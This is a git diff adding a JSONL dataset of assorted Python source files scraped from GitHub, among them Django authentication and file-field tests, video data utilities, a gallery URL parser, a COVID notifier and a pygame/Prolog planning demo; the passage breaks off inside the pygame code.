diff --git "a/6617.jsonl" "b/6617.jsonl" new file mode 100644--- /dev/null +++ "b/6617.jsonl" @@ -0,0 +1,1751 @@ +{"seq_id":"10497637211","text":"from django.test import TestCase\nfrom ..backends import JWTAuthentication\nfrom rest_framework.test import APIClient\nfrom rest_framework.test import APITestCase\nfrom rest_framework import request, authentication, exceptions\nfrom ..models import User\n\n\nclass JwtTestCase(JWTAuthentication, TestCase):\n '''Test JWT authentication for authors-haven'''\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n\n self.client = APIClient()\n self.register_url = '/api/users/'\n self.login_url = '/api/users/login/'\n self.get_user_url = '/api/user/'\n\n self.user = {\n \"user\": {\n \"username\": \"dude\",\n \"email\": \"dude1@gmail.com\",\n \"password\": \"password\"\n }\n }\n\n self.response = self.client.post(\n self.register_url, self.user, format='json')\n User.objects.filter(email=\"dude1@gmail.com\").update(is_verified=True)\n self.user_login = self.client.post(\n self.login_url, self.user, format='json')\n\n def test_auth_header_prefix(self):\n self.assertEqual('Token', self.authentication_header_prefix)\n\n def test_user_can_get_token(self):\n self.assertEqual(201, self.response.status_code)\n self.assertIn('user_token', self.user_login.data)\n\n def test_authenticate_credentials(self):\n self.token = self.user_login.data['user_token']\n resp = self._authenticate_credentials(request, self.token)\n\n def test_authenticate(self):\n resp = self.authenticate\n self.assertTrue(resp != None)\n","repo_name":"andela/ah-backend-thor","sub_path":"authors/apps/authentication/tests/test_jwt_auth.py","file_name":"test_jwt_auth.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"896526871","text":"#Numbers from 1 to scope=100 divisible by 8\n\ndef gen_list_divisable_by(scope=None,div=None):\n if not scope:\n scope = 100\n if not div:\n div = 8\n results = []\n for i in range(1,scope+1):\n if (i % div) == 0:\n results.append(i)\n return results\n\nif __name__ == \"__main__\":\n scope=None\n div=None\n while True:\n try:\n scope=input(\"give range: \")\n scope=int(scope)\n break\n except ValueError:\n if not scope: break\n print(\"It's OK\")\n while True:\n try:\n div=input(\"give divisable: \")\n div=int(div)\n break\n except ValueError:\n if not div: break\n print(\"It's OK\")\n print(\"Found \", len(gen_list_divisable_by(scope,div)), \"numbers\")\n ","repo_name":"krzeczyca/praca","sub_path":"projekt_1.py","file_name":"projekt_1.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73095055468","text":"'''\nData-related utilities and helper methods.\nCreated by Basile Van Hoorick.\n'''\n\nfrom __init__ import *\n\n# Library imports.\nimport glob\nimport joblib\n\n# Internal imports.\nimport my_utils\n\ncache = joblib.Memory('cache/', verbose=1)\n\n\n@cache.cache\ndef recursive_listdir(src_dp, extensions=['jpg', 'jpeg', 'png']):\n '''\n :param src_dp (str).\n :param extensions (list of str).\n :return src_fps (list of str).\n '''\n src_fps = []\n \n # Get all full file paths with specified extensions.\n for ext in extensions:\n src_fps += glob.glob(os.path.join(src_dp, '**/*.' + ext.lower()), recursive=True)\n src_fps += glob.glob(os.path.join(src_dp, '**/*.' 
+ ext.upper()), recursive=True)\n src_fps = sorted(src_fps)\n\n # Exclude probably invalid temporary file names starting with a dot.\n src_fps = [fp for fp in src_fps if not(fp.split('/')[-1].startswith('.'))]\n\n return src_fps\n\n\ndef read_video_audio_clip(video_fp, audio_fp, sel_num_frames=16, sel_start_time=None,\n read_audio=True):\n # https://pytorch.org/vision/main/auto_examples/plot_video_api.html\n # https://pytorch.org/vision/stable/io.html#video\n # NOTE: this doesn't work with pixel phone recorded videos.\n av_reader = torchvision.io.VideoReader(video_fp, 'video')\n metadata = copy.deepcopy(av_reader.get_metadata())\n\n video_duration = metadata['video']['duration'][0]\n video_fps = metadata['video']['fps'][0]\n assert video_duration > 0\n assert video_fps > 0\n\n # Set clip boundaries.\n available_frames = round(video_duration * video_fps)\n assert available_frames >= 4\n if sel_num_frames <= 0:\n sel_num_frames = available_frames + 1 # This ensures counter never breaks.\n if sel_start_time == 'random':\n # Max end value leaves a small margin to ensure audio synchronization is always possible.\n start_frame = np.random.randint(0, available_frames - sel_num_frames - 2)\n else:\n # Round to ensure the requested timestamp (in seconds) is followed accurately.\n start_frame = int(np.round(sel_start_time * video_fps))\n start_time = start_frame / video_fps\n end_frame = start_frame + sel_num_frames\n end_time = end_frame / video_fps\n\n # Read clip video frames always.\n av_reader.set_current_stream('video')\n av_reader.seek(start_time)\n frames = []\n video_pts = []\n counter = 0\n\n for frame in av_reader:\n frames.append(frame['data']) # (C, H, W) tensor.\n video_pts.append(frame['pts']) # single float.\n counter += 1\n if counter >= sel_num_frames:\n break\n\n frames = torch.stack(frames, 0) # (T, C, H, W) tensor.\n video_real_start = video_pts[0]\n video_real_end = video_pts[-1] + 1.0 / video_fps\n\n # NOTE: For these requested values to be correct, we assume video_pts is equally spaced with\n # interval = 1 / FPS. 
Other cases are probably rare and difficult to deal with.\n metadata['vid_avail_frames'] = available_frames\n metadata['vid_duration'] = video_duration\n metadata['vid_fps'] = video_fps\n metadata['vid_start_frame'] = start_frame\n metadata['vid_start_time'] = start_time\n metadata['vid_end_frame'] = end_frame\n metadata['vid_end_time'] = end_time\n metadata['vid_real_start'] = video_real_start\n metadata['vid_real_end'] = video_real_end\n\n # Read clip audio waveform if desired.\n if read_audio:\n if audio_fp is not None:\n av_reader = torchvision.io.VideoReader(audio_fp, 'audio')\n audio_metadata = copy.deepcopy(av_reader.get_metadata())\n metadata['audio'] = audio_metadata['audio']\n\n audio_duration = metadata['audio']['duration'][0]\n audio_sample_rate = metadata['audio']['framerate'][0]\n assert audio_duration > 0\n assert audio_sample_rate > 0\n assert audio_duration >= video_duration\n\n # NOTE: We assume audio packets are always shorter than video frames, and that PTS\n # (presentation timestamp) denotes when to _start_ presenting a packet.\n # https://en.wikipedia.org/wiki/Presentation_timestamp\n av_reader.set_current_stream('audio')\n av_reader.seek(video_real_start - 1.0 / video_fps)\n\n wavelets = []\n audio_pts = []\n counter = 0\n\n for frame in av_reader:\n wavelets.append(frame['data']) # (T, C) tensor with WXYZ if C = 4.\n audio_pts.append(frame['pts']) # single float.\n counter += 1\n if audio_pts[-1] > video_real_end:\n break\n\n waveform = torch.cat(wavelets, 0) # (T, C) tensor with WXYZ if C = 4.\n audio_real_start = audio_pts[0]\n audio_real_end = audio_pts[-1] + wavelets[-1].shape[0] / audio_sample_rate\n\n # NOTE: video_pts and audio_pts have different temporal strides / intervals, i.e.\n # (1 / video_fps) and (wavelet_size / sample_rate) respectively. 
We sampled audio packets in\n # such a way that it encompasses the video clip, so now we simply concatenate and mark the\n # appropriate subset to take.\n num_samples = waveform.shape[0]\n align_start = (video_real_start - audio_real_start) / (audio_real_end - audio_real_start)\n align_end = (video_real_end - audio_real_start) / (audio_real_end - audio_real_start)\n align_start_idx = int(align_start * num_samples)\n align_end_idx = int(align_end * num_samples)\n\n waveform = waveform[align_start_idx:align_end_idx]\n num_samples_per_frame = audio_sample_rate / video_fps\n nspf_align = waveform.shape[0] / frames.shape[0]\n np.testing.assert_approx_equal(nspf_align, num_samples_per_frame, significant=3)\n\n metadata['aud_duration'] = audio_duration\n metadata['aud_sample_rate'] = audio_sample_rate\n metadata['aud_read_samples'] = num_samples\n metadata['aud_read_real_start'] = audio_real_start\n metadata['aud_read_real_end'] = audio_real_end\n metadata['aud_align_start_idx'] = align_start_idx\n metadata['aud_align_end_idx'] = align_end_idx\n metadata['aud_samples_per_frame'] = num_samples_per_frame\n\n else:\n waveform = None\n audio_pts = None\n\n del av_reader\n del metadata['video']\n del metadata['audio']\n\n return (frames, waveform, video_pts, audio_pts, metadata)\n\n\ndef read_all_images(src_dp, exclude_patterns=None, count_only=False, use_tqdm=False, stack=False,\n early_resize_height=None):\n '''\n :param src_dp (str).\n :return frames (T, H, W, 3) array with float32 in [0, 1].\n '''\n src_fps = list(sorted(glob.glob(os.path.join(src_dp, '*.jpg')) +\n glob.glob(os.path.join(src_dp, '*.png'))))\n\n if count_only:\n return len(src_fps)\n\n if exclude_patterns is not None:\n if not(isinstance(exclude_patterns, list)):\n exclude_patterns = [exclude_patterns]\n for pattern in exclude_patterns:\n src_fps = [fp for fp in src_fps if not(pattern in fp)]\n\n frames = []\n if use_tqdm:\n src_fps = tqdm.tqdm(src_fps)\n\n for fp in src_fps:\n frame = plt.imread(fp)[..., 0:3]\n frame = (frame / 255.0).astype(np.float32)\n\n if early_resize_height is not None and early_resize_height > 0:\n (H1, W1) = frame.shape[:2]\n if H1 > early_resize_height:\n (H2, W2) = (early_resize_height, int(round(early_resize_height * W1 / H1)))\n frame = cv2.resize(frame, (W2, H2), interpolation=cv2.INTER_LINEAR)\n\n frames.append(frame)\n\n if stack: # Otherwise, remain list for efficiency.\n frames = np.stack(frames)\n\n return frames\n\n\ndef read_image_robust(img_path, no_fail=False):\n '''\n Loads and returns an image that meets conditions along with a success flag, in order to avoid\n crashing.\n '''\n try:\n image = plt.imread(img_path).copy() # (H, W) or (H, W, 3) array of uint8.\n success = True\n\n if image.ndim == 2:\n image = np.stack([image] * 3, axis=-1)\n elif image.shape[2] == 1:\n image = np.stack([image[..., 0]] * 3, axis=-1)\n elif image.shape[2] == 4:\n image = image[..., 0:3]\n\n if (image.ndim != 3 or image.shape[2] != 3\n or np.any(np.array(image.strides) < 0)):\n # Either not RGB or has negative stride, so discard.\n success = False\n if no_fail:\n raise RuntimeError(f'ndim: {image.ndim} '\n f'dtype: {image.dtype} '\n f'shape: {image.shape} '\n f'strides: {image.strides}')\n\n except IOError as e:\n # Probably corrupt file.\n image = None\n success = False\n if no_fail:\n raise e\n\n return (image, success)\n\n\ndef pad_div_numpy(div_array, axes, max_size):\n '''\n Adds zeros to the first axis of an array such that it can be collated.\n :param div_array (K, *) array.\n :param axes (tuple) of 
int.\n :param max_size (int) = M.\n :return (padded_div_array, K).\n padded_div_array (M, *) array.\n K (int).\n '''\n K = -1\n pad_width = [(0, 0) for _ in range(div_array.ndim)]\n\n for axis in axes:\n cur_K = div_array.shape[axis]\n if K == -1:\n K = cur_K\n else:\n assert cur_K == K\n\n pad_width[axis] = (0, max_size - K)\n\n # https://numpy.org/doc/stable/reference/generated/numpy.pad.html\n padded_div_array = np.pad(div_array, pad_width, mode='constant', constant_values=0)\n\n return (padded_div_array, K)\n\n\ndef pad_div_torch(div_tensor, axes, max_size):\n '''\n Adds zeros to the first axis of a tensor such that it can be collated.\n :param div_tensor (K, *) tensor.\n :param axes (tuple) of int.\n :param max_size (int) = M.\n :return (padded_div_tensor, K).\n padded_div_tensor (M, *) tensor.\n K (int).\n '''\n K = -1\n pad_width = [(0, 0) for _ in range(div_tensor.ndim)]\n\n for axis in axes:\n cur_K = div_tensor.shape[axis]\n if K == -1:\n K = cur_K\n else:\n assert cur_K == K\n\n pad_width[axis] = (0, max_size - K)\n\n # https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html\n pad_width = list(np.array(list(reversed(pad_width))).flatten())\n padded_div_tensor = torch.nn.functional.pad(div_tensor, pad_width, mode='constant', value=0)\n\n return (padded_div_tensor, K)\n\n\ndef clean_remain_reproducible(data_retval):\n '''\n Prunes a returned batch of examples such that it can be reconstructed deterministically.\n This is useful to save space for debugging, evaluation, and visualization, because\n data_retval can be huge.\n '''\n data_retval_pruned = my_utils.dict_to_cpu(\n data_retval, ignore_keys=['todo'])\n\n return data_retval_pruned\n\n\ndef _paths_from_txt(txt_fp):\n # First, simply obtain all non-empty, non-commented lines.\n with open(txt_fp, 'r') as f:\n lines = f.readlines()\n lines = [line.strip() for line in lines]\n lines = [line for line in lines if len(line) > 0]\n lines = [line for line in lines if not(line.lower().startswith('#'))]\n \n # Then, prepend non-existent (presumed relative) paths with the directory of the text file.\n # This allows for sharing text files across machines without having to modify the contents.\n txt_dp = str(pathlib.Path(txt_fp).parent)\n paths = []\n for line in lines:\n if os.path.exists(line):\n paths.append(line)\n else:\n absolute_path = os.path.join(txt_dp, line)\n assert os.path.exists(absolute_path), absolute_path\n paths.append(absolute_path)\n \n return paths\n\n\ndef get_data_paths_from_args(given_data_paths):\n '''\n Converts any text file into the the list of actual paths it contains as lines within.\n '''\n actual_data_paths = []\n for data_path in given_data_paths:\n if data_path.lower().endswith('.txt'):\n actual_data_paths += _paths_from_txt(data_path)\n else:\n actual_data_paths.append(data_path)\n return actual_data_paths\n","repo_name":"basilevh/pytorch-template","sub_path":"data/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":12207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17396556469","text":"# -*- coding: utf-8 -*-\nimport logging\nimport re\nimport typing\nfrom typing import Optional\nfrom urllib.parse import urljoin\nfrom collections import defaultdict\n\nfrom core.base.parsers import BaseParser\n\nfrom . 
import constants, utilities\n\nfrom core.base.types import GalleryData\n\nif typing.TYPE_CHECKING:\n from viewer.models import WantedGallery\n\nlogger = logging.getLogger(__name__)\n\n\nclass Parser(BaseParser):\n name = constants.provider_name\n accepted_urls = [\n urljoin(constants.base_url, constants.view_path),\n urljoin(constants.base_url, constants.torrent_download_path)\n ]\n\n @staticmethod\n def id_from_url(url: str) -> typing.Optional[str]:\n m = re.search(r\"/view/(\\d+)\", url)\n if m and m.group(1):\n return m.group(1)\n else:\n return None\n\n def crawl_urls(self, urls: list[str], wanted_filters=None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None) -> None:\n\n unique_urls = set()\n gallery_data_list = []\n gallery_wanted_lists: dict[str, list['WantedGallery']] = preselected_wanted_matches or defaultdict(list)\n\n if not self.downloaders:\n logger.warning('No downloaders enabled, returning.')\n return\n\n for url in urls:\n\n if not any(word in url for word in self.accepted_urls):\n logger.warning(\"Invalid URL, skipping: {}\".format(url))\n continue\n\n if constants.torrent_download_path in url:\n utilities.view_link_from_download_link(url)\n\n unique_urls.add(url)\n\n for gallery in unique_urls:\n gid = self.id_from_url(gallery)\n if not gid:\n continue\n\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery_id=gid,\n link=gallery\n )\n\n if discard_approved:\n if not self.settings.silent_processing:\n logger.info(discard_message)\n continue\n\n gallery_data = GalleryData(gid, self.name, link=gallery)\n gallery_data_list.append(gallery_data)\n\n if not gallery_data_list:\n return\n\n self.pass_gallery_data_to_downloaders(gallery_data_list, gallery_wanted_lists)\n\n\nAPI = (\n Parser,\n)\n","repo_name":"pandabuilder/pandachaika","sub_path":"core/providers/nyaa/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"18174856767","text":"from plyer import notification\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\n\n\ndef notifyMe(title, message):\n notification.notify(\n title=title,\n message=message,\n app_icon='icon.ico',\n timeout=15\n )\n\n\ndef getDatafromUrl(url):\n r = requests.get(url)\n return r.text\n\n\nif __name__ == \"__main__\":\n notifyMe(\"Pranav\", \"Lets fight the spread of this virus together\")\n myhtmldata = getDatafromUrl('https://www.mohfw.gov.in/')\n # print(myhtmldata)\n soup = BeautifulSoup(myhtmldata, 'html.parser')\n # print(soup.prettify())\n mydatastr = \"\"\n for tr in soup.find_all('table')[0].find_all('tr'):\n mydatastr = mydatastr + tr.get_text()\n\n mydatastr = mydatastr[1:]\n itemlist = mydatastr.split('\\n\\n')\n itemlist = itemlist[:len(itemlist)-2]\n print(itemlist)\n state = ('Chandigarh', 'Rajasthan', 'Uttar Pradesh')\n for item in itemlist[:34]:\n datalist = item.split('\\n')\n # print(item)\n # print(datalist)\n if datalist[1] in state:\n # print(datalist)\n nTitle = 'cases of covid-19'\n nText = f\"{datalist[1]}:Ind :{datalist[2]}\"\n notifyMe(nTitle, nText)\n time.sleep(2)\n","repo_name":"pranavelric/Corona-Cases-notif","sub_path":"coronacasesNotification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13749849736","text":"print(\"Welcome to the 
rollercoaster!\")\r\n\r\nheight = int(input(\"What is your height in cm? \"))\r\nbill=0\r\n\r\nif height >= 120:\r\n print(\"You can ride the rollercoaster!\")\r\n age = int(input(\"What is your age? \"))\r\n if age < 12:\r\n bill=5\r\n print(\"Child ticket is $5\")\r\n elif age <= 18:\r\n bill=7\r\n print(\"Youth ticket is $7\")\r\n elif age < 45:\r\n bill=12\r\n print(\"Adult ticket is $12\")\r\n elif age >=45 & age <= 55:\r\n print(\"Everything is going to be ok. Have a ride free on us.\")\r\n \r\n want_photo=input(\"Do you want a photo taken? (Y or N) \")\r\n if want_photo==\"Y\":\r\n bill+=3\r\n print(f\"Your final bill is ${bill}\")\r\n else:\r\n print(f\"Your final bill is ${bill}\")\r\n \r\nelse:\r\n print(\"Sorry, you have to grow taller before you can ride.\")\r\n","repo_name":"Kiransala/PythonPractice","sub_path":"rollercoaster4.py","file_name":"rollercoaster4.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6306837785","text":"import os\nimport pickle\nimport sys\nimport tempfile\nimport unittest\nfrom pathlib import Path\n\nfrom django.core.exceptions import SuspiciousFileOperation\nfrom django.core.files import File, temp\nfrom django.core.files.base import ContentFile\nfrom django.core.files.uploadedfile import TemporaryUploadedFile\nfrom django.db import IntegrityError, models\nfrom django.test import TestCase, override_settings\nfrom django.test.utils import isolate_apps\n\nfrom .models import Document\n\n\nclass FileFieldTests(TestCase):\n def test_clearable(self):\n \"\"\"\n FileField.save_form_data() will clear its instance attribute value if\n passed False.\n \"\"\"\n d = Document(myfile=\"something.txt\")\n self.assertEqual(d.myfile, \"something.txt\")\n field = d._meta.get_field(\"myfile\")\n field.save_form_data(d, False)\n self.assertEqual(d.myfile, \"\")\n\n def test_unchanged(self):\n \"\"\"\n FileField.save_form_data() considers None to mean \"no change\" rather\n than \"clear\".\n \"\"\"\n d = Document(myfile=\"something.txt\")\n self.assertEqual(d.myfile, \"something.txt\")\n field = d._meta.get_field(\"myfile\")\n field.save_form_data(d, None)\n self.assertEqual(d.myfile, \"something.txt\")\n\n def test_changed(self):\n \"\"\"\n FileField.save_form_data(), if passed a truthy value, updates its\n instance attribute.\n \"\"\"\n d = Document(myfile=\"something.txt\")\n self.assertEqual(d.myfile, \"something.txt\")\n field = d._meta.get_field(\"myfile\")\n field.save_form_data(d, \"else.txt\")\n self.assertEqual(d.myfile, \"else.txt\")\n\n def test_delete_when_file_unset(self):\n \"\"\"\n Calling delete on an unset FileField should not call the file deletion\n process, but fail silently (#20660).\n \"\"\"\n d = Document()\n d.myfile.delete()\n\n def test_refresh_from_db(self):\n d = Document.objects.create(myfile=\"something.txt\")\n d.refresh_from_db()\n self.assertIs(d.myfile.instance, d)\n\n @unittest.skipIf(sys.platform == \"win32\", \"Crashes with OSError on Windows.\")\n def test_save_without_name(self):\n with tempfile.NamedTemporaryFile(suffix=\".txt\") as tmp:\n document = Document.objects.create(myfile=\"something.txt\")\n document.myfile = File(tmp)\n msg = f\"Detected path traversal attempt in '{tmp.name}'\"\n with self.assertRaisesMessage(SuspiciousFileOperation, msg):\n document.save()\n\n def test_defer(self):\n Document.objects.create(myfile=\"something.txt\")\n self.assertEqual(Document.objects.defer(\"myfile\")[0].myfile, 
\"something.txt\")\n\n def test_unique_when_same_filename(self):\n \"\"\"\n A FileField with unique=True shouldn't allow two instances with the\n same name to be saved.\n \"\"\"\n Document.objects.create(myfile=\"something.txt\")\n with self.assertRaises(IntegrityError):\n Document.objects.create(myfile=\"something.txt\")\n\n @unittest.skipIf(\n sys.platform == \"win32\", \"Windows doesn't support moving open files.\"\n )\n # The file's source and destination must be on the same filesystem.\n @override_settings(MEDIA_ROOT=temp.gettempdir())\n def test_move_temporary_file(self):\n \"\"\"\n The temporary uploaded file is moved rather than copied to the\n destination.\n \"\"\"\n with TemporaryUploadedFile(\n \"something.txt\", \"text/plain\", 0, \"UTF-8\"\n ) as tmp_file:\n tmp_file_path = tmp_file.temporary_file_path()\n Document.objects.create(myfile=tmp_file)\n self.assertFalse(\n os.path.exists(tmp_file_path), \"Temporary file still exists\"\n )\n\n def test_open_returns_self(self):\n \"\"\"\n FieldField.open() returns self so it can be used as a context manager.\n \"\"\"\n d = Document.objects.create(myfile=\"something.txt\")\n # Replace the FileField's file with an in-memory ContentFile, so that\n # open() doesn't write to disk.\n d.myfile.file = ContentFile(b\"\", name=\"bla\")\n self.assertEqual(d.myfile, d.myfile.open())\n\n def test_media_root_pathlib(self):\n with tempfile.TemporaryDirectory() as tmp_dir:\n with override_settings(MEDIA_ROOT=Path(tmp_dir)):\n with TemporaryUploadedFile(\n \"foo.txt\", \"text/plain\", 1, \"utf-8\"\n ) as tmp_file:\n document = Document.objects.create(myfile=tmp_file)\n self.assertIs(\n document.myfile.storage.exists(\n os.path.join(\"unused\", \"foo.txt\")\n ),\n True,\n )\n\n def test_pickle(self):\n with tempfile.TemporaryDirectory() as tmp_dir:\n with override_settings(MEDIA_ROOT=Path(tmp_dir)):\n with open(__file__, \"rb\") as fp:\n file1 = File(fp, name=\"test_file.py\")\n document = Document(myfile=\"test_file.py\")\n document.myfile.save(\"test_file.py\", file1)\n try:\n dump = pickle.dumps(document)\n loaded_document = pickle.loads(dump)\n self.assertEqual(document.myfile, loaded_document.myfile)\n self.assertEqual(\n document.myfile.url,\n loaded_document.myfile.url,\n )\n self.assertEqual(\n document.myfile.storage,\n loaded_document.myfile.storage,\n )\n self.assertEqual(\n document.myfile.instance,\n loaded_document.myfile.instance,\n )\n self.assertEqual(\n document.myfile.field,\n loaded_document.myfile.field,\n )\n myfile_dump = pickle.dumps(document.myfile)\n loaded_myfile = pickle.loads(myfile_dump)\n self.assertEqual(document.myfile, loaded_myfile)\n self.assertEqual(document.myfile.url, loaded_myfile.url)\n self.assertEqual(\n document.myfile.storage,\n loaded_myfile.storage,\n )\n self.assertEqual(\n document.myfile.instance,\n loaded_myfile.instance,\n )\n self.assertEqual(document.myfile.field, loaded_myfile.field)\n finally:\n document.myfile.delete()\n\n @isolate_apps(\"model_fields\")\n def test_abstract_filefield_model(self):\n \"\"\"\n FileField.model returns the concrete model for fields defined in an\n abstract model.\n \"\"\"\n\n class AbstractMyDocument(models.Model):\n myfile = models.FileField(upload_to=\"unused\")\n\n class Meta:\n abstract = True\n\n class MyDocument(AbstractMyDocument):\n pass\n\n document = MyDocument(myfile=\"test_file.py\")\n self.assertEqual(document.myfile.field.model, 
MyDocument)\n","repo_name":"django/django","sub_path":"tests/model_fields/test_filefield.py","file_name":"test_filefield.py","file_ext":"py","file_size_in_byte":7460,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"23186264825","text":"from time import sleep\nimport pygame, sys\nfrom pyswip import Prolog, Atom, Functor\n\nprolog = Prolog()\nprolog.consult(\"planning\")\n\npygame.init()\n\nWIDTH = 800 \nHEIGHT = 600\n\nDELAY_TIME = 2\n\nVIDEO_POSITION = ( 300, 212)\nVIDEO_SIZE = ( 300, 200)\n\nscreen = pygame.display.set_mode(( WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n\nbg_surface = pygame.image.load('./image/background.PNG')\nbg_surface = pygame.transform.scale(bg_surface, (WIDTH, HEIGHT))\n\nplayerImg = pygame.image.load('./image/charlecter.png')\nplayerImg = pygame.transform.scale( playerImg, ( 50, 50))\n\ntaskImg = pygame.image.load('./image/task.png')\ntaskImg = pygame.transform.scale(taskImg, ( 50, 50))\n\ndef loadImage( inputList, pathLocation, end ):\n print('loading images...')\n\n for item in range( 1, end):\n path = ( pathLocation + f' ({item}).jpg')\n image = pygame.image.load( path )\n image = pygame.transform.scale( image , VIDEO_SIZE )\n inputList.append( image )\n\ncleanO2Imgs = []\nIMAGE_FILE_LENGTH = 136\nloadImage( cleanO2Imgs, './video/cleanO2filter/cleanFilter', IMAGE_FILE_LENGTH)\n\nfixingLightImgs = []\nIMAGE_FILE_LENGTH = 65\nloadImage( fixingLightImgs, './video/fixingLight/fixLight', IMAGE_FILE_LENGTH)\n\nnavigationImgs = []\nIMAGE_FILE_LENGTH = 118\nloadImage( navigationImgs, './video/navigation/navigation', IMAGE_FILE_LENGTH)\n\nreactorImages = []\nIMAGE_FILE_LENGTH = 429\nloadImage( reactorImages, './video/reactor/reactor', IMAGE_FILE_LENGTH)\n\nrebootWifiImages = []\nIMAGE_FILE_LENGTH = 235\nloadImage( rebootWifiImages, './video/rebootWifi/rebootWifi', IMAGE_FILE_LENGTH)\n\nspots = {'cafereria':(400, 50) ,\n 'northeasthallway':(510 , 110),\n 'weapons':( 565, 57),\n 'o2': ( 520, 190),\n 'navigation':(690, 210),\n 'easthallway':(590, 280),\n 'shields':(550, 380),\n 'communications': (480, 450),\n 'southeasthallway':(450, 400),\n 'storage':(380, 365),\n 'centerhallway':(400, 310),\n 'admin':( 490, 280),\n 'electrical':( 270, 330),\n 'southwesthallway':(250, 460),\n 'lowerengine':(110, 350),\n 'westhallway':(120, 260),\n 'reactor':(57, 220),\n 'security':( 180, 225),\n 'upperengine':(115, 85),\n 'northwesthallway':(250, 120),\n 'medbay':(260, 170)}\n\ntaskVideos = {\n spots['o2'] : cleanO2Imgs,\n spots['electrical'] : fixingLightImgs,\n spots['navigation'] : navigationImgs,\n spots['reactor'] : reactorImages,\n spots['communications'] : rebootWifiImages\n}\n\nqueryTasks = ['goal(clean(filter,true))',\n 'goal(chart(course,true))',\n 'goal(fix(wiring,true))',\n 'goal(start(reactor,true))',\n 'goal(reboot(wifi,true))']\n\nmissionRooms = { 'goal(clean(filter,true))':'o2',\n 'goal(chart(course,true))':'navigation',\n 'goal(fix(wiring,true))':'electrical',\n 'goal(start(reactor,true))':'reactor',\n 'goal(reboot(wifi,true))':'communications'}\n\ntaks = []\n\ntaksSpikes = []\n\nclass Player( pygame.sprite.Sprite ):\n def __init__( self , image = None):\n pygame.sprite.Sprite.__init__( self )\n\n self.width = 50\n self.height = 50\n\n if image == None:\n self.image = pygame.Surface( ( self.width, self.height ))\n self.image.fill( (0, 255, 0) )\n else:\n self.image = image\n \n self.rect = self.image.get_rect()\n self.rect.center = ( spots['cafereria'])\n self.position = spots['cafereria']\n\n def 
setWidth( self , width ):\n self.width = width\n\n def setHeight( self , height ):\n self.height = height\n\n def setImage( self ):\n self.image = pygame.Surface( ( self.width, self.height ))\n\n def update( self ):\n self.rect.x = self.position[0]\n self.rect.y = self.position[1]\n\n def setPosition( self, position ):\n self.position = position\n \n def getPosition( self ):\n return self.position\n\nclass TaskVideo():\n def __init__( self ):\n self.DELAY_TIME = 100000\n self.images = []\n \n def displayImage( self ):\n for image in self.images:\n screen.blit( image , VIDEO_POSITION ) \n pygame.display.update()\n self.delay()\n\n def delay( self ):\n for _ in range( self.DELAY_TIME ):\n pass\n\n def setImages( self, images ):\n self.images = images \n\ndef displayTask():\n print('0: Clean o2 filter')\n print('1: Chart course')\n print('2: Fix wiring')\n print('3: Start reactor')\n print('4: Reboot wifi')\n print('5 or more: exit')\n\ndef getMoveList( queryList ):\n movePath = []\n #for path in spots:\n # movePath.append( spots[path] )\n for soln in prolog.query(\"a_star(_,P)\"):\n for p in soln[\"P\"]:\n if not isinstance(p, Functor):\n #print(\"task\", p)\n continue\n for args in p.args:\n args = str(args)\n #print(\"goto\", args)\n movePath.append(spots[args])\n break\n\n return movePath\n\ndef getPath( taks ):\n inputing = True\n\n print(\"=========input task=========\") \n while inputing:\n displayTask()\n \n userInput = int( input(\"\\ninput your task you want to do: \") )\n if userInput >= 5:\n inputing = False \n else:\n taks.append( queryTasks[userInput] )\n prolog.assertz(queryTasks[userInput])\n\n print(\"=========end input task=========\")\n\n return getMoveList( queryTasks )\n\ndef delay( delayTime ):\n for _ in range( delayTime * 10000000 ):\n pass\n\ndef inputEvent():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.MOUSEBUTTONUP:\n pos = pygame.mouse.get_pos()\n print( pos )\n\ndef clearTaskSpikes( taksSpikes ):\n for taksSpike in taksSpikes:\n taksSpike.setPosition( (-50, -50) )\n\ndef displayVideo( previousePlayerPosition, taskPosition, taksSpikes, taskVideo ):\n taskIndex = taskPosition.index( previousePlayerPosition )\n taskPosition.pop( taskIndex )\n clearTaskSpikes( taksSpikes )\n\n for task in range( len(taskPosition) ):\n taksSpikes[ task ].setPosition( taskPosition[task] )\n\n taskVideo.setImages( taskVideos[ previousePlayerPosition ] )\n taskVideo.displayImage()\n\n###########################################################################################################################################\n#add player\nall_sprites = pygame.sprite.Group()\nplayer = Player( playerImg )\nall_sprites.add( player )\n\n#taskVideo\ntaskVideo = TaskVideo()\n\n#add task\nfor i in range( 5 ): \n task = Player( taskImg )\n taksSpikes.append( task )\n task.setPosition( (-50, -50) )\n all_sprites.add( task )\n \n#init change var\nmoveList = []\ntaskPosition = []\nlistIndex = 0\npreviousePlayerPosition = 0\ndisplayVideoFlag = False\ngetInput = True\n\nwhile True:\n inputEvent()\n \n #input task\n if getInput == True:\n for task in taks: prolog.retract(task)\n \n taks = []\n\n player.setPosition( spots[ 'cafereria' ] )\n moveList = getPath( taks )\n getInput = False\n \n #setPoition for task\n for task in range( len( taks ) ):\n taskPoistion = taks[ task ] \n missionName = missionRooms[ taskPoistion ]\n\n taksSpikes[ task ].setPosition( spots[missionName] )\n taskPosition.append( spots[missionName] )\n \n 
